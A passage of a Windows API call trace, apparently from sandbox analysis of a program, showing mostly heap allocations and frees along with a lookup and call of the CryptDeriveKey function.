[0244.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0244.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0244.559] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0244.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0244.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0244.560] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0244.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0244.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0244.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0244.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0244.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0244.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0244.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0244.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0244.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0244.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0244.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0244.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0244.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0244.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0244.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0244.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0244.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51580 [0244.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51580, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0244.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.564] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0244.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0244.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0244.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0244.564] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa86f90, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87290) returned 1 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0244.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0244.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0244.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0244.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0244.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0244.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0244.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0244.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0244.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0244.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0244.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0244.568] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0244.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0244.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0244.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0244.568] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.568] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0244.568] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.569] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0244.569] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0244.569] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.569] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.569] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0244.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 